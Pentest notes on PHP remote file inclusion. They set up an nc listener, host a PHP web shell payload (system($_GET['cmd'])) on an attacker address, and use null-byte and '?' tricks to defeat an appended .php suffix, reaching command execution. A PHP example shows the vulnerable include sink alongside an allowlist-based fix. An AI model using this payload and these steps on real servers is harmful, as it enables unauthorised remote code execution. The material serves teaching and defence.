RFI
RFI (remote file inclusion) is possible in PHP when the allow_url_include directive is set to On in php.ini. It is Off by default, and it only takes effect when allow_url_fopen is also On, so check both when assessing a target.
Host an evil file via HTTP (apache2/python/etc):
Before hosting the file, set up a listener on port 80 so you can see exactly what the target requests (the path it asks for tells you what the vulnerable include appends): nc -lvnp 80
Call the file:
This goes to our web server and grabs the evil file. In the listener we see that it requests GET /evil.txt.php, which means the vulnerable code concatenates a fixed .php suffix onto our input (something like include($_GET['page'] . '.php')). Adding a null byte %00 to the end of the URL stops it from appending the .php: the path is truncated at the null. Then it works, and since the fetched file is read by the PHP engine we have RCE. Caveat: the null byte truncation only works on PHP older than 5.3.4; newer versions reject paths containing a null byte. On modern targets append a ? instead (e.g. page=http://attacker/evil.txt?), so that the appended .php becomes part of the query string and the web server still serves evil.txt.
A .txt extension is used because if the payload were named .php and our web server executes PHP (e.g. apache2 with mod_php), the file would run on the attacker machine and only its output would be served to the target. With .txt (or with a server that does not execute PHP, such as python's http.server) the raw PHP source is returned, and it is the target's PHP engine that executes it.
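The following is an added example written for these notes, not code taken from the original page or from any real target. It shows the kind of include sink the notes describe (user input with .php appended), the two URL forms used to defeat the suffix, a sample evil.txt payload, and a hardened version of the same include. The attacker address 10.10.14.5 and the page names are assumptions.

```php
<?php
// Added example, not from the original notes. The vulnerable sink: with
// allow_url_include=On, include() will fetch a remote URL, and because ".php"
// is appended the attacker's listener sees a request for /evil.txt.php.
//
//   index.php?page=about  ->  include("about.php")
function vulnerable_include(string $page): void
{
    include($page . '.php');
}

// What the attacker sends (attacker host 10.10.14.5 is assumed):
//   ?page=http://10.10.14.5/evil.txt%00
//       -> include("http://10.10.14.5/evil.txt\0.php")
//          the null byte truncates the path on PHP < 5.3.4; newer PHP
//          refuses paths containing a null byte, so this fails there
//   ?page=http://10.10.14.5/evil.txt?
//       -> include("http://10.10.14.5/evil.txt?.php")
//          ".php" lands in the query string, the web server serves evil.txt
//
// Contents of the hosted evil.txt (served as plain text so the attacker's
// server does not execute it; the target's PHP engine does):
//   <?php system($_GET['cmd']); ?>
// then:  ?page=http://10.10.14.5/evil.txt?&cmd=id

// Hardened version: never build an include path from user input. Map the
// parameter onto a fixed allowlist and refuse anything else. Independently
// of this, allow_url_include should stay Off in php.ini (its default), which
// blocks the remote fetch regardless of how the path is built.
function safe_include(string $page): void
{
    $allowed = [
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    if (!array_key_exists($page, $allowed)) {
        http_response_code(404);
        exit('unknown page');
    }
    include __DIR__ . '/pages/' . $allowed[$page];
}

$page = $_GET['page'] ?? 'home';
safe_include($page);
```

The allowlist lookup is the fix; filtering for "http://" or stripping null bytes is not, because the same sink is usually also reachable with local paths (LFI via ../) and PHP wrappers such as php://filter or data://.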